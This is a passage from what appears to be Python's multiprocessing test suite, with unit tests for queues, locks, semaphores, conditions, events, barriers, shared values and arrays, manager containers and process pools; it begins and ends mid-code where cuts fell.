q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_nested_queue(self):
a = self.list() # Test queue inside list
a.append(self.Queue())
a[0].put(123)
self.assertEqual(a[0].get(), 123)
b = self.dict() # Test queue inside dict
b[0] = self.Queue()
b[0].put(456)
self.assertEqual(b[0].get(), 456)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
